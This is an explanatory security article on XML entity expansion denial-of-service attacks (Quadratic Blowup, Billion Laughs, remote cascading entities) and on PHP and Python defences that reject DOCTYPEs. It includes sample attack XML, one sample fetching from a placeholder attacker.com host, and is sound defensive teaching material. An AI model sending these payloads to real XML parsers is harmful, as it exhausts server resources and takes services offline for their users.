XML Entity Expansion Attacks: Code Examples
XML Entity Expansion is somewhat similar to XML External Entity Injection (XXE), but it focuses on mounting a denial-of-service (DoS) attack by exhausting the resources of the target application's server environment. The attack works by creating a custom entity definition in the XML's DOCTYPE. Such a definition can, for example, generate an in-memory structure far larger than the size of the original XML would suggest, letting the attacker consume the memory a web server needs to keep operating efficiently. The attack also applies to HTML5's XML serialization, which the libxml2 extension currently does not recognize as HTML.
There are several ways to expand custom XML entities so as to exhaust server resources.
Generic Entity Expansion is also known as the "Quadratic Blowup Attack". In this approach, a custom entity is defined as an extremely long string. When the entity is referenced many times in a document, it is expanded at each reference, producing an XML structure that needs far more RAM than the size of the original XML suggests.
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]>
<results>
    <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result>
    <result>&long;&long;&long;&long;&long;&long;&long;
    &long;&long;&long;&long;&long;&long;&long;&long;
    &long;&long;&long;&long;&long;&long;&long;&long;
    &long;&long;&long;&long;&long;&long;&long;&long;
    Keep it going...
    &long;&long;&long;&long;&long;&long;&long;...</result>
</results>
By balancing the size of the custom entity string with the number of entities used within the body of the document, you can create an XML document or string that scales to take up a predictable amount of RAM space on the server. By occupying server RAM with repeated requests like this, a successful denial of service attack can be launched. The disadvantage of this method is that since the memory consumption effect is based on simple multiplication, the initial XML document or string itself needs to be large enough.
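The multiplication described above can be sketched in a few lines of Python. This is only a rough estimate under stated assumptions: the helper name `quadratic_blowup_size` is hypothetical, the entity is assumed to be named `long` as in the sample document, and the surrounding markup and the parser's own per-node overhead are ignored.

```python
def quadratic_blowup_size(entity_bytes: int, references: int) -> tuple[int, int]:
    """Estimate (input size, expanded size) in bytes for a Quadratic Blowup payload.

    Assumption: the entity is called "long", so every reference "&long;"
    costs 6 bytes of input. Surrounding markup is ignored.
    """
    reference_bytes = len("&long;")
    # The entity value is sent once, plus one short reference per use.
    input_size = entity_bytes + references * reference_bytes
    # Every reference expands to the full entity value.
    expanded_size = entity_bytes * references
    return input_size, expanded_size


# A 100,000-byte entity referenced 100,000 times.
input_size, expanded_size = quadratic_blowup_size(100_000, 100_000)
print(f"input: {input_size:,} bytes, expanded: {expanded_size:,} bytes")
```

With these illustrative numbers, roughly 700 KB of input expands to about 10 GB of text, which shows why the attacker still has to send a fairly large document.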
Generic entity expansion needs a large XML input, whereas recursive entity expansion produces a far stronger effect per byte of input. It relies on the XML parser resolving nested entity references, so that a small set of entities grows exponentially. Through this exponential growth, an input much smaller than the one a generic entity expansion attack needs can expand to an enormous size. The approach is therefore aptly called the "XML Bomb" or "Billion Laughs Attack".
<?xml version="1.0"?>
<!DOCTYPE results [
    <!ENTITY x0 "BOOM!">
    <!ENTITY x1 "&x0;&x0;">
    <!ENTITY x2 "&x1;&x1;">
    <!ENTITY x3 "&x2;&x2;">
    <!-- Add the remaining sequence from x4...x100 (or boom) -->
    <!ENTITY x99 "&x98;&x98;">
    <!ENTITY boom "&x99;&x99;">
]>
<results>
    <result>Explode in 3...2...1...&boom;</result>
</results>
The XML Bomb does not require a large XML input, which the application might otherwise restrict by size. Each entity doubles the one before it, so the fully expanded text is 2^100 times the size of the initial &x0; entity value. That is a huge and destructive bomb!
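To put a number on that growth, the following Python sketch computes the size of the fully expanded text. It assumes the entity chain from the sample document (`x0` holding "BOOM!", doubled 100 times up to `boom`); the function names are hypothetical, and the small `expand` helper exists only to check the formula on a harmless chain.

```python
def recursive_expansion_size(base_value: str, doublings: int) -> int:
    """Size in bytes of the expanded text when each entity doubles the previous one."""
    return len(base_value.encode("utf-8")) * 2 ** doublings


def expand(base_value: str, doublings: int) -> str:
    """Actually perform the doubling. Only safe for a small number of doublings."""
    value = base_value
    for _ in range(doublings):
        value = value + value
    return value


# Sanity check on a tiny chain: three doublings of "BOOM!" give 8 copies.
assert len(expand("BOOM!", 3)) == recursive_expansion_size("BOOM!", 3)

# The chain in the sample document: x1..x99 plus boom is 100 doublings.
size = recursive_expansion_size("BOOM!", 100)
print(f"{size:.2e} bytes")
```

The result is on the order of 10^30 bytes from an input of only a few kilobytes, far beyond what any server could hold in memory.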
Both generic and recursive entity expansion attacks rely on entities defined locally in the XML's DTD, but an attacker can also define entities externally. This obviously requires the XML parser to be able to make remote HTTP requests, as we saw earlier when describing the XML External Entity Injection (XXE) attack. Refusing such requests is a basic security measure for your XML parser, so the defenses against XXE also protect against this form of XML entity expansion attack.
Even though it can be defended against in this way, a remote entity expansion attack works by making the XML parser issue a remote HTTP request to fetch the expanded value of the referenced entity. The response may itself define further external entities, for which the XML parser must make additional HTTP requests. A seemingly innocuous request can therefore quickly spiral out of control and tax the server's available resources. If the fetched content also includes a recursive expansion attack, the end result is even worse.
<?xml version="1.0"?>
<!DOCTYPE results [
    <!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml">
]>
<results>
    <result>3..2..1...&cascade;</result>
</results>
These attacks can also lead to more roundabout DoS attacks. For example, the remote requests can be pointed at the local application or at any other application sharing its server resources. The result can be a self-inflicted DoS attack, in which the XML parser's attempts to resolve external entities trigger numerous requests to local applications and so consume even more server resources. In this way, XML External Entity Injection (XXE) can be used to amplify the impact of the attacks discussed earlier and complete a DoS attack.
The following general defenses are inherited from our defenses against ordinary XML External Entity Injection (XXE) attacks. We should refuse to let custom entities in XML resolve local files or make remote HTTP requests, using the following function, which applies globally to all PHP XML extensions that use libxml2 internally.
libxml_disable_entity_loader(true);
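Admittedly, PHP has a reputation for not playing by the rules, and it does not offer the conventional defense, which is to completely refuse custom entity definitions made through an XML DTD in the DOCTYPE. PHP does define a LIBXML_NOENT constant for substituting entities, as well as the public property DOMDocument::$substituteEntities, but neither has any noticeable mitigating effect. It seems we are stuck with makeshift workarounds instead of a proper solution.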
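Even so, libxml2 does refuse to resolve recursive entities by default. When recursive entities go wrong, they light up your error log like a Christmas tree. There is therefore no particular need for a specific defense against recursive entities, although we should still do something in case libxml2 ever relapses into resolving them.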
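The main new threat therefore comes from the crude approach of Generic Entity Expansion, the Quadratic Blowup Attack. This attack needs no remote or local system calls and no entity recursion. In fact, the only defenses are to discard the XML or to sanitize any XML that contains a DOCTYPE. Discarding the XML is the safest choice unless a DOCTYPE is expected and the XML was received from a secure, trusted source, for example over a peer-verified HTTPS connection. Otherwise, since PHP gives us no option to disable DTDs, we have to build our own logic. Assuming you can call libxml_disable_entity_loader(TRUE), the following check is safe to run, because entity expansion is deferred until a node value affected by the expansion is accessed, which the check never does.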
$dom = new DOMDocument;
$dom->loadXML($xml);
foreach ($dom->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        throw new \InvalidArgumentException(
            'Invalid XML: Detected use of illegal DOCTYPE'
        );
    }
}
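Of course, the code above should be used together with libxml_disable_entity_loader set to TRUE, so that external entity references are not resolved when the XML is first loaded. Where an XML parser does not rely on libxml2, this check may be the only defense available, unless the parser has its own comprehensive set of options controlling how entities are resolved.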
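As an illustration of the same DOCTYPE check with a parser that is not built on libxml2, here is a minimal Python sketch using the standard library's expat bindings. The names `DoctypeForbidden` and `reject_doctype` are hypothetical and not part of any library. The idea, assumed here rather than taken from the original article, is to abort parsing as soon as a DOCTYPE declaration starts, before any entity it defines can be expanded.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an XML document carries a DOCTYPE declaration."""


def reject_doctype(xml_text: str) -> None:
    """Parse xml_text and raise DoctypeForbidden if it declares a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when the DOCTYPE declaration begins; raising here stops
        # the parse before the document body is processed.
        raise DoctypeForbidden("Invalid XML: Detected use of illegal DOCTYPE")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)  # True marks this as the final chunk


# A document without a DOCTYPE passes silently.
reject_doctype("<results><result>ok</result></results>")

# A document that defines a custom entity is rejected.
payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]>'
    "<results><result>&long;</result></results>"
)
try:
    reject_doctype(payload)
except DoctypeForbidden as error:
    print(error)
```

Malformed input raises `xml.parsers.expat.ExpatError` instead, so a caller would normally treat both exceptions as grounds to discard the XML.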
If you want to use SimpleXML, remember that you can convert the checked DOMDocument object with the simplexml_import_dom() function.
Original article: Injection Attacks